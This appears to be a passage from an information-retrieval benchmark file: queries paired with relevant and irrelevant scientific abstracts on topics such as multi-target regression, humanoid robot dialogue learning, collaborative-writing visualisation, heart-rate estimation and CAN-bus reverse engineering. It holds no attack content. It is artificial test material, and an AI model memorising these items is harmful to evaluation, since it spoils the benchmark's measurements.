"text": "Real world prediction problems often involve the simultaneous prediction of multiple target variables using the same set of predictive variables. When the target variables are binary, the prediction task is called multi-label classification while when the target variables are realvalued the task is called multi-target regression. Although multi-target regression attracted the attention of the research community prior to multi-label classification, the recent advances in this field motivate a study of whether newer state-of-the-art algorithms developed for multilabel classification are applicable and equally successful in the domain of multi-target regression. In this paper we introduce two new multitarget regression algorithms: multi-target stacking (MTS) and ensemble of regressor chains (ERC), inspired by two popular multi-label classification approaches that are based on a single-target decomposition of the multi-target problem and the idea of treating the other prediction targets as additional input variables that augment the input space. Furthermore, we detect an important shortcoming on both methods related to the methodology used to create the additional input variables and develop modified versions of the algorithms (MTSC and ERCC) to tackle it. All methods are empirically evaluated on 12 real-world multi-target regression datasets, 8 of which are first introduced in this paper and are made publicly available for future benchmarks. The experimental results show that ERCC performs significantly better than both a strong baseline that learns a single model for each target using bagging of regression trees and the state-of-the-art multi-objective random forest approach. Also, the proposed modification results in significant performance gains for both MTS and ERC.",
"title": ""
},
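The chaining idea described in the passage above (predict each target from the inputs augmented with predictions for earlier targets) can be sketched in a few lines. This is an illustrative reconstruction, not the authors' ERC/ERCC code: the base learner, the random chain order, and the use of in-sample predictions for augmentation (the very shortcoming that ERCC addresses with out-of-sample predictions) are all simplifying assumptions made here.

```python
# Minimal single regressor chain for multi-target regression (illustrative only).
import numpy as np
from sklearn.base import clone
from sklearn.tree import DecisionTreeRegressor

def fit_regressor_chain(X, Y, base=DecisionTreeRegressor(), order=None, rng=None):
    """Fit one chain: target j is predicted from X plus predictions of earlier targets."""
    rng = np.random.default_rng(rng)
    n_targets = Y.shape[1]
    order = rng.permutation(n_targets) if order is None else order
    models, X_aug = [], X.copy()
    for j in order:
        m = clone(base).fit(X_aug, Y[:, j])
        models.append(m)
        # Augment the inputs with this target's predictions for the next model in the chain.
        X_aug = np.hstack([X_aug, m.predict(X_aug)[:, None]])
    return order, models

def predict_regressor_chain(X, order, models):
    preds = np.empty((X.shape[0], len(order)))
    X_aug = X.copy()
    for k, j in enumerate(order):
        preds[:, j] = models[k].predict(X_aug)
        X_aug = np.hstack([X_aug, preds[:, j][:, None]])
    return preds
```

An ensemble (the "E" in ERC) would simply average the predictions of several such chains fitted with different random orders.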
{
"docid": "ae3dda04efd601d8be361c6a32ec7bcc",
"text": "Many large-scale machine learning (ML) applications use iterative algorithms to converge on parameter values that make the chosen model fit the input data. Often, this approach results in the same sequence of accesses to parameters repeating each iteration. This paper shows that these repeating patterns can and should be exploited to improve the efficiency of the parallel and distributed ML applications that will be a mainstay in cloud computing environments. Focusing on the increasingly popular \"parameter server\" approach to sharing model parameters among worker threads, we describe and demonstrate how the repeating patterns can be exploited. Examples include replacing dynamic cache and server structures with static pre-serialized structures, informing prefetch and partitioning decisions, and determining which data should be cached at each thread to avoid both contention and slow accesses to memory banks attached to other sockets. Experiments show that such exploitation reduces per-iteration time by 33--98%, for three real ML workloads, and that these improvements are robust to variation in the patterns over time.",
"title": ""
},
{
"docid": "08260ba76f242725b8a08cbd8e4ec507",
"text": "Vocal singing (singing with lyrics) shares features common to music and language but it is not clear to what extent they use the same brain systems, particularly at the higher cortical level, and how this varies with expertise. Twenty-six participants of varying singing ability performed two functional imaging tasks. The first examined covert generative language using orthographic lexical retrieval while the second required covert vocal singing of a well-known song. The neural networks subserving covert vocal singing and language were found to be proximally located, and their extent of cortical overlap varied with singing expertise. Nonexpert singers showed greater engagement of their language network during vocal singing, likely accounting for their less tuneful performance. In contrast, expert singers showed a more unilateral pattern of activation associated with reduced engagement of the right frontal lobe. The findings indicate that singing expertise promotes independence from the language network with decoupling producing more tuneful performance. This means that the age-old singing practice of 'finding your singing voice' may be neurologically mediated by changing how strongly singing is coupled to the language system.",
"title": ""
},
{
"docid": "63fef6099108f7990da0a7687e422e14",
"text": "The IWSLT 2017 evaluation campaign has organised three tasks. The Multilingual task, which is about training machine translation systems handling many-to-many language directions, including so-called zero-shot directions. The Dialogue task, which calls for the integration of context information in machine translation, in order to resolve anaphoric references that typically occur in human-human dialogue turns. And, finally, the Lecture task, which offers the challenge of automatically transcribing and translating real-life university lectures. Following the tradition of these reports, we will described all tasks in detail and present the results of all runs submitted by their participants.",
"title": ""
},
{
"docid": "20d754528009ebce458eaa748312b2fe",
"text": "This poster provides a comparative study between Inverse Reinforcement Learning (IRL) and Apprenticeship Learning (AL). IRL and AL are two frameworks, using Markov Decision Processes (MDP), which are used for the imitation learning problem where an agent tries to learn from demonstrations of an expert. In the AL framework, the agent tries to learn the expert policy whereas in the IRL framework, the agent tries to learn a reward which can explain the behavior of the expert. This reward is then optimized to imitate the expert. One can wonder if it is worth estimating such a reward, or if estimating a policy is sufficient. This quite natural question has not really been addressed in the literature right now. We provide partial answers, both from a theoretical and empirical point of view.",
"title": ""
},
{
"docid": "f3a4f5bd47e978d3c74aa5dbfe93f9f9",
"text": "We study the problem of analyzing tweets with Universal Dependencies (UD; Nivre et al., 2016). We extend the UD guidelines to cover special constructions in tweets that affect tokenization, part-ofspeech tagging, and labeled dependencies. Using the extended guidelines, we create a new tweet treebank for English (TWEEBANK V2) that is four times larger than the (unlabeled) TWEEBANK V1 introduced by Kong et al. (2014). We characterize the disagreements between our annotators and show that it is challenging to deliver consistent annotation due to ambiguity in understanding and explaining tweets. Nonetheless, using the new treebank, we build a pipeline system to parse raw tweets into UD. To overcome annotation noise without sacrificing computational efficiency, we propose a new method to distill an ensemble of 20 transition-based parsers into a single one. Our parser achieves an improvement of 2.2 in LAS over the un-ensembled baseline and outperforms parsers that are state-ofthe-art on other treebanks in both accuracy and speed.",
"title": ""
},
{
"docid": "7d05958787d0f7a510aab1109c97b502",
"text": "The purpose of this review is to gain more insight in the neuropathology of pathological gambling and problem gambling, and to discuss challenges in this research area. Results from the reviewed PG studies show that PG is more than just an impulse control disorder. PG seems to fit very well with recent theoretical models of addiction, which stress the involvement of the ventral tegmental-orbito frontal cortex. Differentiating types of PG on game preferences (slot machines vs. casino games) seems to be useful because different PG groups show divergent results, suggesting different neurobiological pathways to PG. A framework for future studies is suggested, indicating the need for hypothesis driven pharmacological and functional imaging studies in PG and integration of knowledge from different research areas to further elucidate the neurobiological underpinnings of this disorder. Cognitive and neuroimaging findings in pathological gambling",
"title": ""
},
{
"docid": "981da4eddfc1c9fbbceef437f5f43439",
"text": "A significant number of schizophrenic patients show patterns of smooth pursuit eye-tracking patterns that differ strikingly from the generally smooth eye-tracking seen in normals and in nonschizophrenic patients. These deviations are probably referable not only to motivational or attentional factors, but also to oculomotor involvement that may have a critical relevance for perceptual dysfunction in schizophrenia.",
"title": ""
},
{
"docid": "5680f69d9f93c2def5f3a0cb5854b1d4",
"text": "Heart rate (HR) monitoring is necessary for daily healthcare. Wrist-type photoplethsmography (PPG) is a convenient and non-invasive technique for HR monitoring. However, motion artifacts (MA) caused by subjects' movements can extremely interfere the results of HR monitoring. In this paper, we propose a high accuracy method using motion decision, singular spectrum analysis (SSA) and spectral peak searching for daily HR estimation. The proposed approach was evaluated on 8 subjects under a series of different motion states. Compared with electrocardiogram (ECG) recorded simultaneously, the experimental results indicated that the averaged absolute estimation error was 2.33 beats per minute (BPM).",
"title": ""
},
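Of the three stages named in the passage above, only the final spectral-peak-searching step lends itself to a compact sketch. The snippet below estimates heart rate from a synthetic PPG segment by locating the dominant FFT peak inside a plausible heart-rate band; the motion-decision and SSA denoising stages are omitted, and the sampling rate, window length, and signal model are invented for the demo rather than taken from the paper.

```python
# Toy spectral-peak heart-rate estimate from a synthetic PPG window.
import numpy as np

fs = 125.0                                  # sampling rate in Hz (assumed)
t = np.arange(0, 8, 1 / fs)                 # 8-second analysis window
ppg = np.sin(2 * np.pi * 1.5 * t) + 0.3 * np.random.randn(t.size)  # ~90 BPM + noise

spectrum = np.abs(np.fft.rfft(ppg * np.hanning(ppg.size)))
freqs = np.fft.rfftfreq(ppg.size, d=1 / fs)
band = (freqs >= 0.7) & (freqs <= 3.5)      # 42–210 BPM search band
hr_hz = freqs[band][np.argmax(spectrum[band])]
print(f"estimated heart rate: {hr_hz * 60:.1f} BPM")
```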
{
"docid": "fcda8929585bc0e27e138070674dc455",
"text": "Also referred to as Gougerot-Carteaud syndrome, confluent and reticulated papillomatosis (CARP) is an acquired keratinization disorder of uncertain etiology. Clinically, it is typically characterized by symptomless, grayish-brown, scaly, flat papules that coalesce into larger patches with a reticular pattern at the edges. Sites most commonly affected include the anterior and/or posterior upper trunk region [1–3]. Although its clinical diagnosis is usually straightforward, the distinction from similar pigmentary dermatoses may sometimes be challenging, especially in case of lesions occurring in atypical locations [1–3]. In recent years, dermatoscopy has been shown to be useful in the clinical diagnosis of several “general” skin disorders, thus reducing the number of cases requiring biopsy [4–8]. The objective of the present study was to describe the dermatoscopic features of CARP in order to facilitate its noninvasive diagnosis. Eight individuals (3 women/5 men; mean age 29.2 years, range 18–51 years; mean disease duration 3 months, range 1–9 months) with CARP (diagnosed on the basis of histological findings and clinical criteria) [1] were included in the study. None of the patients had been using systemic or topical therapies for at least six weeks. In each patient, a handheld noncontact polarized dermatoscope (DermLite DL3 × 10; 3 Gen, San Juan Capistrano, CA, USA) equipped with a camera (Coolpix® 4500 Nikon Corporation, Melville, NY, USA) was used to take a dermatoscopic picture of a single target lesion (flat desquamative papule). All pictures were evaluated for the presence of specific morphological patterns by two of the authors (EE, GS). In all cases (100.0 %), we observed the same findings: fine whitish scaling as well as homogeneous, brownish, more or less defined, flat polygonal globules separated by whitish/ pale striae, thus creating a cobblestone pattern (Figure 1a, b). The shade of the flat globules was dark-brown (Figure 1a) in five (62.5 %) and light-brown (Figure 1b) in three (37.5 %) cases. To the best of our knowledge, there has only been one previous publication on dermatoscopy of CARP. In that particular study, findings included superficial white scales (likely due to parakeratosis and compact hyperkeratosis), brownish pigmentation with poorly defined borders (thought to correspond to hyperpigmentation of the basal layer), and a pattern of “sulci and gyri” (depressions and elevations, presumably as a result of papillomatosis) [9]. In the present study, we were able to confirm some of the aforementioned findings (white scaling and brownish pigmentation), however, the brownish areas in our patients consistently showed a cobblestone pattern (closely aggregated, squarish/polygonal, flat globules). This peculiar aspect could be due to the combination of basal hyperpigmentation, acanthosis, and papillomatosis, with relative sparing of the normal network of furrows of the skin surface. Accordingly, one might speculate that the different pattern of pigmentation found in the previous study might have resulted from the disruption of these physiological grooves due to more pronounced/irregular acanthosis/ papillomatosis. Remarkably, the detection of fine whitish scaling and brownish areas in a cobblestone or “sulci and gyri” pattern might be useful in distinguishing CARP from its differential diagnoses [10] (Table 1). These primarily include 1) tinea (pityriasis) versicolor, which is characterized by a pigmented network composed of brownish stripes and fine scales [11],",
"title": ""
},
{
"docid": "c9ff6e6c47b6362aaba5f827dd1b48f2",
"text": "IEC 62056 for upper-layer protocols and IEEE 802.15.4g for communication infrastructure are promising means of advanced metering infrastructure (AMI) in Japan. However, since the characteristics of a communication system based on these combined technologies have yet to be identified, this paper gives the communication failure rates and latency acquired by calculations. In addition, the calculation results suggest some adequate AMI configurations, and show its extensibility in consideration of the usage environment.",
"title": ""
}
] | scidocsrr |
bf573ca20f03af584b2bda71f75f2d05 | Training an Interactive Humanoid Robot Using Multimodal Deep Reinforcement Learning | [
{
"docid": "5273e9fea51c85651255de7c253066a0",
"text": "This paper presents SimpleDS, a simple and publicly available dialogue system trained with deep reinforcement learning. In contrast to previous reinforcement learning dialogue systems, this system avoids manual feature engineering by performing action selection directly from raw text of the last system and (noisy) user responses. Our initial results, in the restaurant domain, report that it is indeed possible to induce reasonable behaviours with such an approach that aims for higher levels of automation in dialogue control for intelligent interactive agents.",
"title": ""
}
] | [
{
"docid": "db78f4fa7e3a795b14f423a7dfa99828",
"text": "Music shares a very special relation with human emotions. We often choose to listen to a song or music which best fits our mood at that instant. In spite of this strong correlation, most of the music applications today are devoid of providing the facility of mood-aware playlist generation. We wish to contribute to automatic identification of mood in audio songs by utilizing their spectral and temporal audio features. Our current work involves analysis of various features in order to learn, train and test the model representing the moods of the audio songs. Focus of our work is on the Indian popular music pieces and our work continues to analyse, develop and improve the algorithms to produce a system to recognize the mood category of the audio files automatically.",
"title": ""
},
{
"docid": "9a4fc12448d166f3a292bfdf6977745d",
"text": "Enabled by the rapid development of virtual reality hardware and software, 360-degree video content has proliferated. From the network perspective, 360-degree video transmission imposes significant challenges because it consumes 4 6χ the bandwidth of a regular video with the same resolution. To address these challenges, in this paper, we propose a motion-prediction-based transmission mechanism that matches network video transmission to viewer needs. Ideally, if viewer motion is perfectly known in advance, we could reduce bandwidth consumption by 80%. Practically, however, to guarantee the quality of viewing experience, we have to address the random nature of viewer motion. Based on our experimental study of viewer motion (comprising 16 video clips and over 150 subjects), we found the viewer motion can be well predicted in 100∼500ms. We propose a machine learning mechanism that predicts not only viewer motion but also prediction deviation itself. The latter is important because it provides valuable input on the amount of redundancy to be transmitted. Based on such predictions, we propose a targeted transmission mechanism that minimizes overall bandwidth consumption while providing probabilistic performance guarantees. Real-data-based evaluations show that the proposed scheme significantly reduces bandwidth consumption while minimizing performance degradation, typically a 45% bandwidth reduction with less than 0.1% failure ratio.",
"title": ""
},
{
"docid": "bf71f7f57def7633a5390b572e983bc9",
"text": "With the development of the Internet, cyber-attacks are changing rapidly and the cyber security situation is not optimistic. This survey report describes key literature surveys on machine learning (ML) and deep learning (DL) methods for network analysis of intrusion detection and provides a brief tutorial description of each ML/DL method. Papers representing each method were indexed, read, and summarized based on their temporal or thermal correlations. Because data are so important in ML/DL methods, we describe some of the commonly used network datasets used in ML/DL, discuss the challenges of using ML/DL for cybersecurity and provide suggestions for research directions.",
"title": ""
},
{
"docid": "02dab9e102d1b8f5e4f6ab66e04b3aad",
"text": "CHILD CARE PRACTICES ANTECEDING THREE PATTERNS OF PRESCHOOL BEHAVIOR. STUDIED SYSTEMATICALLY CHILD-REARING PRACTICES ASSOCIATED WITH COMPETENCE IN THE PRESCHOOL CHILD. 2015 American Psychological Association PDF documents require Adobe Acrobat Reader.Effects of Authoritative Parental Control on Child Behavior, Child. Child care practices anteceding three patterns of preschool behavior. Genetic.She is best known for her work on describing parental styles of child care and. Anteceding Three Patterns of Preschool Behavior, Genetic Psychology.Child care practices anteceding three patterns of preschool behavior.",
"title": ""
},
{
"docid": "55f95c7b59f17fb210ebae97dbd96d72",
"text": "Clustering is a widely studied data mining problem in the text domains. The problem finds numerous applications in customer segmentation, classification, collaborative filtering, visualization, document organization, and indexing. In this chapter, we will provide a detailed survey of the problem of text clustering. We will study the key challenges of the clustering problem, as it applies to the text domain. We will discuss the key methods used for text clustering, and their relative advantages. We will also discuss a number of recent advances in the area in the context of social network and linked data.",
"title": ""
},
{
"docid": "0ff76204fcdf1a7cf2a6d13a5d3b1597",
"text": "In this study, we found that the optimum take-off angle for a long jumper may be predicted by combining the equation for the range of a projectile in free flight with the measured relations between take-off speed, take-off height and take-off angle for the athlete. The prediction method was evaluated using video measurements of three experienced male long jumpers who performed maximum-effort jumps over a wide range of take-off angles. To produce low take-off angles the athletes used a long and fast run-up, whereas higher take-off angles were produced using a progressively shorter and slower run-up. For all three athletes, the take-off speed decreased and the take-off height increased as the athlete jumped with a higher take-off angle. The calculated optimum take-off angles were in good agreement with the athletes' competition take-off angles.",
"title": ""
},
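The prediction method described in the preceding abstract can be illustrated numerically: plug angle-dependent fits of take-off speed and height into the projectile range equation and search for the angle that maximises range. The linear fits and their coefficients below are made-up placeholders standing in for the athlete-specific measurements, not values from the study.

```python
# Sketch: optimum take-off angle from the projectile range equation plus
# hypothetical fits of take-off speed/height versus take-off angle.
import numpy as np

g = 9.81  # gravitational acceleration, m/s^2

def takeoff_speed(theta_deg):       # assumed fit: speed drops as the angle rises
    return 9.5 - 0.06 * theta_deg   # m/s (placeholder coefficients)

def takeoff_height(theta_deg):      # assumed fit: height rises with the angle
    return 0.45 + 0.01 * theta_deg  # m (placeholder coefficients)

def flight_range(theta_deg):
    v, h = takeoff_speed(theta_deg), takeoff_height(theta_deg)
    th = np.radians(theta_deg)
    vx, vy = v * np.cos(th), v * np.sin(th)
    # Range of a projectile released at height h above the landing level.
    return vx * (vy + np.sqrt(vy**2 + 2 * g * h)) / g

angles = np.linspace(10, 45, 351)
best = angles[np.argmax([flight_range(a) for a in angles])]
print(f"predicted optimum take-off angle: {best:.1f} degrees")
```

Because speed falls with angle, the maximising angle comes out well below the 45° optimum of a fixed-speed projectile, which is the qualitative point of the study.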
{
"docid": "f5e2f0c8b3f7e7537751e5e411e665ce",
"text": "Network Function Virtualization (NFV) applications are stateful. For example, a Content Distribution Network (CDN) caches web contents from remote servers and serves them to clients. Similarly, an Intrusion Detection System (IDS) and an Intrusion Prevention System (IPS) have both per-flow and multi-flow (shared) states to properly react to intrusions. On today's NFV infrastructures, security vulnerabilities many allow attackers to steal and manipulate the internal states of NFV applications that share a physical resource. In this paper, we propose a new protection scheme, S-NFV that incorporates Intel Software Guard Extensions (Intel SGX) to securely isolate the states of NFV applications.",
"title": ""
},
{
"docid": "4e7f7b1444b253a63d4012b2502f5fa4",
"text": "State-of-the-art techniques for 6D object pose recovery depend on occlusion-free point clouds to accurately register objects in 3D space. To deal with this shortcoming, we introduce a novel architecture called Iterative Hough Forest with Histogram of Control Points that is capable of estimating the 6D pose of an occluded and cluttered object, given a candidate 2D bounding box. Our Iterative Hough Forest (IHF) is learnt using parts extracted only from the positive samples. These parts are represented with Histogram of Control Points (HoCP), a “scale-variant” implicit volumetric description, which we derive from recently introduced Implicit B-Splines (IBS). The rich discriminative information provided by the scale-variant HoCP features is leveraged during inference. An automatic variable size part extraction framework iteratively refines the object’s roughly aligned initial pose due to the extraction of coarsest parts, the ones occupying the largest area in image pixels. The iterative refinement is accomplished based on finer (smaller) parts, which are represented with more discriminative control point descriptors by using our Iterative Hough Forest. Experiments conducted on a publicly available dataset report that our approach shows better registration performance than the state-of-the-art methods. © 2017 Elsevier B.V. All rights reserved.",
"title": ""
},
{
"docid": "804113bb0459eb04d9b163c086050207",
"text": "The techniques of machine vision are extensively applied to agricultural science, and it has great perspective especially in the plant protection field, which ultimately leads to crops management. The paper describes a software prototype system for rice disease detection based on the infected images of various rice plants. Images of the infected rice plants are captured by digital camera and processed using image growing, image segmentation techniques to detect infected parts of the plants. Then the infected part of the leaf has been used for the classification purpose using neural network. The methods evolved in this system are both image processing and soft computing technique applied on number of diseased rice plants.",
"title": ""
},
{
"docid": "c32cecbc4adc812de6e43b3b0b05866b",
"text": "Reinforcement learning for embodied agents is a challenging problem. The accumulated reward to be optimized is often a very rugged function, and gradient methods are impaired by many local optimizers. We demonstrate, in an experimental setting, that incorporating an intrinsic reward can smoothen the optimization landscape while preserving the global optimizers of interest. We show that policy gradient optimization for locomotion in a complex morphology is significantly improved when supplementing the extrinsic reward by an intrinsic reward defined in terms of the mutual information of time consecutive sensor readings.",
"title": ""
},
{
"docid": "e7f9822daaf18371e53beb75d6e1fb30",
"text": "In this paper1, we propose to disentangle and interpret contextual effects that are encoded in a pre-trained deep neural network. We use our method to explain the gaming strategy of the alphaGo Zero model. Unlike previous studies that visualized image appearances corresponding to the network output or a neural activation only from a global perspective, our research aims to clarify how a certain input unit (dimension) collaborates with other units (dimensions) to constitute inference patterns of the neural network and thus contribute to the network output. The analysis of local contextual effects w.r.t. certain input units is of special values in real applications. Explaining the logic of the alphaGo Zero model is a typical application. In experiments, our method successfully disentangled the rationale of each move during the Go game.",
"title": ""
},
{
"docid": "067fd264747d466b86710366c14a4495",
"text": "We present Embodied Construction Grammar, a formalism for linguist ic analysis designed specifically for integration into a simulation-based model of language unders tanding. As in other construction grammars, linguistic constructions serve to map between phonological f orms and conceptual representations. In the model we describe, however, conceptual representations are als o constrained to be grounded in the body’s perceptual and motor systems, and more precisely to parameteri ze m ntal simulations using those systems. Understanding an utterance thus involves at least two dis inct processes: analysis to determine which constructions the utterance instantiates, and simulationaccording to the parameters specified by those constructions. In this chapter, we outline a constru ction formalism that is both representationally adequate for these purposes and specified precisely enough for se in a computational architecture.",
"title": ""
},
{
"docid": "049f0308869c53bbb60337874789d569",
"text": "In machine learning, one of the main requirements is to build computational models with a high ability to generalize well the extracted knowledge. When training e.g. artificial neural networks, poor generalization is often characterized by over-training. A common method to avoid over-training is the hold-out crossvalidation. The basic problem of this method represents, however, appropriate data splitting. In most of the applications, simple random sampling is used. Nevertheless, there are several sophisticated statistical sampling methods suitable for various types of datasets. This paper provides a survey of existing sampling methods applicable to the data splitting problem. Supporting experiments evaluating the benefits of the selected data splitting techniques involve artificial neural networks of the back-propagation type.",
"title": ""
},
{
"docid": "8a6955ee53b9920a7c192143557ddf44",
"text": "C utaneous metastases rarely develop in patients having cancer with solid tumors. The reported incidence of cutaneous metastases from a known primary malignancy ranges from 0.6% to 9%, usually appearing 2 to 3 years after the initial diagnosis.1-11 Skin metastases may represent the first sign of extranodal disease in 7.6% of patients with a primary oncologic diagnosis.1 Cutaneous metastases may also be the first sign of recurrent disease after treatment, with 75% of patients also having visceral metastases.2 Infrequently, cutaneous metastases may be seen as the primary manifestation of an undiagnosed malignancy.12 Prompt recognition of such tumors can be of great significance, affecting prognosis and management. The initial presentation of cutaneous metastases is frequently subtle and may be overlooked without proper index of suspicion, appearing as multiple or single nodules, plaques, and ulcers, in decreasing order of frequency. Commonly, a painless, mobile, erythematous papule is initially noted, which may enlarge to an inflammatory nodule over time.8 Such lesions may be misdiagnosed as cysts, lipomas, fibromas, or appendageal tumors. Clinical features of cutaneous metastases rarely provide information regarding the primary tumor, although the location of the tumor may be helpful because cutaneous metastases typically manifest in the same geographic region as the initial cancer. The most common primary tumors seen with cutaneous metastases are melanoma, breast, and squamous cell carcinoma of the head and neck.1 Cutaneous metastases are often firm, because of dermal or lymphatic involvement, or erythematous. These features may help rule out some nonvascular entities in the differential diagnosis (eg, cysts and fibromas). The presence of pigment most commonly correlates with cutaneous metastases from melanoma. Given the limited body of knowledge regarding distinct clinical findings, we sought to better elucidate the dermoscopic patterns of cutaneous metastases, with the goal of using this diagnostic tool to help identify these lesions. We describe 20 outpatients with biopsy-proven cutaneous metastases secondary to various underlying primary malignancies. Their clinical presentation is reviewed, emphasizing the dermoscopic findings, as well as the histopathologic correlation.",
"title": ""
},
{
"docid": "080a097ddc53effd838494f40b7d39c2",
"text": "This paper surveys research on applying neuroevolution (NE) to games. In neuroevolution, artificial neural networks are trained through evolutionary algorithms, taking inspiration from the way biological brains evolved. We analyze the application of NE in games along five different axes, which are the role NE is chosen to play in a game, the different types of neural networks used, the way these networks are evolved, how the fitness is determined and what type of input the network receives. The paper also highlights important open research challenges in the field.",
"title": ""
},
{
"docid": "1efad72897441fb8b2f0fa4279a76e49",
"text": "MOTIVATION\nIdentifying cells in an image (cell segmentation) is essential for quantitative single-cell biology via optical microscopy. Although a plethora of segmentation methods exists, accurate segmentation is challenging and usually requires problem-specific tailoring of algorithms. In addition, most current segmentation algorithms rely on a few basic approaches that use the gradient field of the image to detect cell boundaries. However, many microscopy protocols can generate images with characteristic intensity profiles at the cell membrane. This has not yet been algorithmically exploited to establish more general segmentation methods.\n\n\nRESULTS\nWe present an automatic cell segmentation method that decodes the information across the cell membrane and guarantees optimal detection of the cell boundaries on a per-cell basis. Graph cuts account for the information of the cell boundaries through directional cross-correlations, and they automatically incorporate spatial constraints. The method accurately segments images of various cell types grown in dense cultures that are acquired with different microscopy techniques. In quantitative benchmarks and comparisons with established methods on synthetic and real images, we demonstrate significantly improved segmentation performance despite cell-shape irregularity, cell-to-cell variability and image noise. As a proof of concept, we monitor the internalization of green fluorescent protein-tagged plasma membrane transporters in single yeast cells.\n\n\nAVAILABILITY AND IMPLEMENTATION\nMatlab code and examples are available at http://www.csb.ethz.ch/tools/cellSegmPackage.zip.",
"title": ""
},
{
"docid": "f20e7c515d79f51fba660afc7cc3a7c5",
"text": "We present an approach for the joint extraction of entities and relations in the context of opinion recognition and analysis. We identify two types of opinion-related entities — expressions of opinions and sources of opinions — along with the linking relation that exists between them. Inspired by Roth and Yih (2004), we employ an integer linear programming approach to solve the joint opinion recognition task, and show that global, constraint-based inference can significantly boost the performance of both relation extraction and the extraction of opinion-related entities. Performance further improves when a semantic role labeling system is incorporated. The resulting system achieves F-measures of 79 and 69 for entity and relation extraction, respectively, improving substantially over prior results in the area.",
"title": ""
},
{
"docid": "c25a62b5798e7c08579efb61c35f2c66",
"text": "In this paper, we propose a new adaptive stochastic gradient Langevin dynamics (ASGLD) algorithmic framework and its two specialized versions, namely adaptive stochastic gradient (ASG) and adaptive gradient Langevin dynamics(AGLD), for non-convex optimization problems. All proposed algorithms can escape from saddle points with at most $O(\\log d)$ iterations, which is nearly dimension-free. Further, we show that ASGLD and ASG converge to a local minimum with at most $O(\\log d/\\epsilon^4)$ iterations. Also, ASGLD with full gradients or ASGLD with a slowly linearly increasing batch size converge to a local minimum with iterations bounded by $O(\\log d/\\epsilon^2)$, which outperforms existing first-order methods.",
"title": ""
},
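For readers unfamiliar with the family of methods the ASGLD abstract builds on, the core stochastic gradient Langevin dynamics update is shown below: a noisy gradient step with injected Gaussian noise, which is what lets the iterate escape saddle points. This is a bare-bones sketch only; the adaptive ingredients of ASGLD/AGLD (how the step size and batch size are scheduled) are deliberately omitted, and the function names and parameters are assumptions.

```python
# Bare-bones stochastic gradient Langevin dynamics (SGLD) loop.
import numpy as np

def sgld(grad_fn, x0, step=1e-3, temperature=1.0, n_iters=1000, rng=0):
    """grad_fn(x) returns a stochastic gradient estimate of the objective at x."""
    rng = np.random.default_rng(rng)
    x = np.array(x0, dtype=float)
    for _ in range(n_iters):
        g = grad_fn(x)
        noise = rng.normal(size=x.shape) * np.sqrt(2.0 * step * temperature)
        x = x - step * g + noise   # gradient step plus injected Gaussian noise
    return x

# Example: move away from the saddle of f(x, y) = x^2 - y^2 at the origin.
grad = lambda x: np.array([2 * x[0], -2 * x[1]]) + np.random.normal(scale=0.1, size=2)
print(sgld(grad, [0.0, 0.0], n_iters=200))
```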
{
"docid": "3dd266e768b989c24965a301984788a0",
"text": "Security analytics and forensics applied to in-vehicle networks are growing research areas that gained relevance after recent reports of cyber-attacks against unmodified licensed vehicles. However, the application of security analytics algorithms and tools to the automotive domain is hindered by the lack of public specifications about proprietary data exchanged over in-vehicle networks. Since the controller area network (CAN) bus is the de-facto standard for the interconnection of automotive electronic control units, the lack of public specifications for CAN messages is a key issue. This paper strives to solve this problem by proposing READ: a novel algorithm for the automatic Reverse Engineering of Automotive Data frames. READ has been designed to analyze traffic traces containing unknown CAN bus messages in order to automatically identify and label different types of signals encoded in the payload of their data frames. Experimental results based on CAN traffic gathered from a licensed unmodified vehicle and validated against its complete formal specifications demonstrate that the proposed algorithm can extract and classify more than twice the signals with respect to the previous related work. Moreover, the execution time of signal extraction and classification is reduced by two orders of magnitude. Applications of READ to CAN messages generated by real vehicles demonstrate its usefulness in the analysis of CAN traffic.",
"title": ""
}
] | scidocsrr |
9cf49ceadcd1c2384bea88ed7718f4f3 | DocuViz: Visualizing Collaborative Writing | [
{
"docid": "7838934c12f00f987f6999460fc38ca1",
"text": "The Internet has fostered an unconventional and powerful style of collaboration: \"wiki\" web sites, where every visitor has the power to become an editor. In this paper we investigate the dynamics of Wikipedia, a prominent, thriving wiki. We make three contributions. First, we introduce a new exploratory data analysis tool, the history flow visualization, which is effective in revealing patterns within the wiki context and which we believe will be useful in other collaborative situations as well. Second, we discuss several collaboration patterns highlighted by this visualization tool and corroborate them with statistical analysis. Third, we discuss the implications of these patterns for the design and governance of online collaborative social spaces. We focus on the relevance of authorship, the value of community surveillance in ameliorating antisocial behavior, and how authors with competing perspectives negotiate their differences.",
"title": ""
}
] | [
{
"docid": "79eb0a39106679e80bd1d1edcd100d4d",
"text": "Multi-agent predictive modeling is an essential step for understanding physical, social and team-play systems. Recently, Interaction Networks (INs) were proposed for the task of modeling multi-agent physical systems. One of the drawbacks of INs is scaling with the number of interactions in the system (typically quadratic or higher order in the number of agents). In this paper we introduce VAIN, a novel attentional architecture for multi-agent predictive modeling that scales linearly with the number of agents. We show that VAIN is effective for multiagent predictive modeling. Our method is evaluated on tasks from challenging multi-agent prediction domains: chess and soccer, and outperforms competing multi-agent approaches.",
"title": ""
},
{
"docid": "78d33d767f9eb15ef79a6d016ffcfb3a",
"text": "Healthcare scientific applications, such as body area network, require of deploying hundreds of interconnected sensors to monitor the health status of a host. One of the biggest challenges is the streaming data collected by all those sensors, which needs to be processed in real time. Follow-up data analysis would normally involve moving the collected big data to a cloud data center for status reporting and record tracking purpose. Therefore, an efficient cloud platform with very elastic scaling capacity is needed to support such kind of real time streaming data applications. The current cloud platform either lacks of such a module to process streaming data, or scales in regard to coarse-grained compute nodes. In this paper, we propose a task-level adaptive MapReduce framework. This framework extends the generic MapReduce architecture by designing each Map and Reduce task as a consistent running loop daemon. The beauty of this new framework is the scaling capability being designed at the Map and Task level, rather than being scaled from the compute-node level. This strategy is capable of not only scaling up and down in real time, but also leading to effective use of compute resources in cloud data center. As a first step towards implementing this framework in real cloud, we developed a simulator that captures workload strength, and provisions the amount of Map and Reduce tasks just in need and in real time. To further enhance the framework, we applied two streaming data workload prediction methods, smoothing and Kalman filter, to estimate the unknown workload characteristics. We see 63.1% performance improvement by using the Kalman filter method to predict the workload. We also use real streaming data workload trace to test the framework. Experimental results show that this framework schedules the Map and Reduce tasks very efficiently, as the streaming data changes its arrival rate. © 2014 Elsevier B.V. All rights reserved. ∗ Corresponding author at: Kavli Institute for Astrophysics and Space Research, Massachusetts Institute of Technology, Cambridge, MA 02139, USA. Tel.: +1",
"title": ""
},
{
"docid": "007558b122d9a8272cc0e26caf28e8fc",
